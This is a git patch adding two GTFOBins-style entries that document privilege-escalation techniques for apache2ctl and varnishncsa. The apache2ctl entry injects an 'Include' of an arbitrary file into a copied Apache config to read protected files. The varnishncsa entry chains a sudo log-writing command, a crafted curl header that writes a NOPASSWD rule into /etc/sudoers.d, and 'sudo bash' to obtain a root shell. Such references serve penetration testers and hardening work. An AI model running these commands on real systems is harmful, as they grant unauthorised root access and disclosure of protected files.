From 2c9f0de8e5e23380671f6b46bcc5350dac81c464 Mon Sep 17 00:00:00 2001 From: nuts7 Date: Mon, 19 Jun 2023 10:59:59 +0200 Subject: [PATCH] Add varnishncsa & apache2ctl This commit adds 2 files (_gtfobins/apache2ctl.md and _gtfobins/varnishncsa.md) containing privilege escalation methods for the varnishncsa and apache2ctl utilities. --- _gtfobins/apache2ctl.md | 16 ++++++++++++++++ _gtfobins/varnishncsa.md | 8 ++++++++ 2 files changed, 24 insertions(+) create mode 100644 _gtfobins/apache2ctl.md create mode 100644 _gtfobins/varnishncsa.md diff --git a/_gtfobins/apache2ctl.md b/_gtfobins/apache2ctl.md new file mode 100644 index 0000000..1423710 --- /dev/null +++ b/_gtfobins/apache2ctl.md @@ -0,0 +1,16 @@ +--- +description: apache2ctl is a front end to the Apache HyperText Transfer Protocol (HTTP) server. It is designed to help the administrator control the functioning of the Apache apache2 daemon. +functions: + file-read: + - code: cp -r /etc/apache2/ /tmp/apache2 + - code: | + LFILE=file_to_read + echo "Include $LFILE" >> /tmp/apache2/apache2.conf + - code: apache2ctl -d /tmp/apache2 -k restart + sudo: + - code: cp -r /etc/apache2/ /tmp/apache2 + - code: | + LFILE=file_to_read + echo "Include $LFILE" >> /tmp/apache2/apache2.conf + - code: sudo apache2ctl -d /tmp/apache2 -k restart +--- diff --git a/_gtfobins/varnishncsa.md b/_gtfobins/varnishncsa.md new file mode 100644 index 0000000..65cbbc8 --- /dev/null +++ b/_gtfobins/varnishncsa.md @@ -0,0 +1,8 @@ +--- +description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format. +functions: + sudo: + - code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user & + - code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo + - code: sudo bash +--- \ No newline at end of file